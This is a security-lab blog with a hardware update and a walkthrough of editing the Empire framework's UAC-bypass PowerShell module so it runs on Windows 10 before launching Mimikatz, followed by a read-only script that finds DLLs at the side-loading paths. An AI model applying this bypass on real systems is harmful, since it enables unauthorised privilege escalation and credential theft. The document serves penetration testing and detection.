Infoseclabs part IV

There are some exciting new updates to the lab!  I finally got the Cisco ASA 5505 in, which replaced a Raspberry Pi running OpenWRT.  With this upgrade we are now able to have a functioning DMZ, which affords us the ability to have a publicly available lab!

ASA is in!

I’ve also added a beefy new host and a 52-port Cisco SG-500 switch.  The host has 96 GB of RAM and two quad-core processors.  This was a huge boost in resources. Time to grow the lab even more!

New host added to the lab

I also bought a small LACK from Ikea to use as a makeshift server rack.  It worked out perfectly!

Check us out on IRC if you have any questions!

#infoseclabs

Using Empire in Kali 2.0 to bypass UAC and invoke Mimikatz on Win10

UPDATE:

The guys on the Empire team have since added support for Windows 10, so this is no longer necessary.  🙂

So I was testing out Empire the other day on a Windows 10 box, but kept getting an error message whenever I tried the UAC bypass module:

[!] Unsupported OS!

So I took a look at the script that was running under /Empire/data/module_source/privesc/Invoke-BypassUAC.ps1 and found this:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
    # windows 7/2008
    $szElevDll = 'CRYPTBASE.dll'
    $szElevDir = $env:WINDIR + "\System32\sysprep"
    $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
    $szElevExeFull = "$szElevDir\sysprep.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3")) {
    # windows 8/2012
    $szElevDll = 'NTWDBLIB.dll'
    $szElevDir = $env:WINDIR + "\System32"
    $szElevDirSysWow64 = ''
    $szElevExeFull = "$szElevDir\cliconfg.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 8/2012 detected"
}
else {
    # any other major.minor (including 10.0) falls through to here
    "[!] Unsupported OS!"
    throw("Unsupported OS!")
}

There it is, that dreaded “Unsupported OS!” error.  The script does a major.minor version check, but only matches 6.x (Windows 7/2008 and 8/2012); Windows 10 reports 10.0, so it falls into the else branch.  So let’s change that:

$OSVersion = ([Environment]::OSVersion.Version | %{"$($_.Major).$($_.Minor)"})

if (($OSVersion -eq "6.0") -or ($OSVersion -eq "6.1")) {
    # windows 7/2008
    $szElevDll = 'CRYPTBASE.dll'
    $szElevDir = $env:WINDIR + "\System32\sysprep"
    $szElevDirSysWow64 = $env:WINDIR + "\sysnative\sysprep"
    $szElevExeFull = "$szElevDir\sysprep.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 7/2008 detected"
}
elseif (($OSVersion -eq "6.2") -or ($OSVersion -eq "6.3") -or ($OSVersion -eq "10.0")) {
    # windows 8/2012/10
    $szElevDll = 'NTWDBLIB.dll'
    $szElevDir = $env:WINDIR + "\System32"
    $szElevDirSysWow64 = ''
    $szElevExeFull = "$szElevDir\cliconfg.exe"
    $szElevDllFull = "$szElevDir\$szElevDll"
    $szTempDllPath = $TempPayloadPath
    Write-Verbose "Windows 8/2012 detected"
}
else {
    "[!] Unsupported OS!"
    throw("Unsupported OS!")
}


In the original code (line 555 of the script) the elseif branch only matched Windows 8 or Server 2012.  In the modified version I added a check for Windows 10 (version 10.0) as well, so it takes the same branch.

Success!

After modifying and saving the code, I ran the command again, and this time it worked!
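For the blue-team side of the same excerpt, here is an added PowerShell check that is not code from this post or from the Empire project.  The version-branch above picks a DLL name and an auto-elevating host executable; this script looks for a DLL sitting at those two side-loading paths, records hash, timestamp and Authenticode status for anything it finds, and prints the same major.minor string the script branches on.  The function name Get-UacHijackCandidates and its parameter are my own, and the baseline assumption (that neither DLL is present at those paths on a stock install) should be confirmed against a known-good machine before acting on a hit.

```powershell
# Added example (defender-side check), not part of the Infoseclabs post or the Empire project.
# Function name, parameter and the $candidates list are assumptions made for this example.

function Get-UacHijackCandidates {
    [CmdletBinding()]
    param(
        [string]$WinDir = $env:WINDIR
    )

    # Side-loading locations taken from the post's excerpt.
    # Assumption: on a stock install neither file exists at these paths
    # (CRYPTBASE.dll legitimately lives in System32 itself, not under sysprep;
    # NTWDBLIB.dll is not shipped with Windows). Verify against a known-good baseline.
    $candidates = @(
        @{ Dll = Join-Path $WinDir 'System32\sysprep\CRYPTBASE.dll'; HostExe = Join-Path $WinDir 'System32\sysprep\sysprep.exe' }
        @{ Dll = Join-Path $WinDir 'System32\NTWDBLIB.dll';         HostExe = Join-Path $WinDir 'System32\cliconfg.exe' }
    )

    foreach ($c in $candidates) {
        if (Test-Path -LiteralPath $c.Dll) {
            $item = Get-Item -LiteralPath $c.Dll
            $sig  = Get-AuthenticodeSignature -FilePath $c.Dll
            # Emit one record per hit; anything other than a valid Microsoft signature
            # at one of these paths deserves a closer look and a pull of the file.
            [pscustomobject]@{
                Path            = $c.Dll
                AutoElevateHost = $c.HostExe
                SizeBytes       = $item.Length
                LastWriteUtc    = $item.LastWriteTimeUtc
                SignatureStatus = $sig.Status
                Signer          = $sig.SignerCertificate.Subject
                Sha256          = (Get-FileHash -LiteralPath $c.Dll -Algorithm SHA256).Hash
            }
        }
    }
}

# Show the major.minor string the post's script compares against, as seen on this host.
$osVersion = [Environment]::OSVersion.Version | ForEach-Object { "$($_.Major).$($_.Minor)" }
Write-Output "OSVersion major.minor as seen by the script: $osVersion"

$hits = @(Get-UacHijackCandidates)
if ($hits.Count -eq 0) {
    Write-Output 'No DLL found at the side-loading paths from the post.'
}
else {
    $hits | Format-List
}
```

Run it from an elevated prompt so the System32 paths are readable; it only reads, never deletes, so a hit can be triaged (hash, signer, write time) before anything is removed.  The same two paths are also the obvious place to point file-integrity monitoring or a Sysmon FileCreate rule.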

Here’s a video of me doing this start to finish.  As always, if you have any questions feel free to drop by #infoseclabs on freenode.
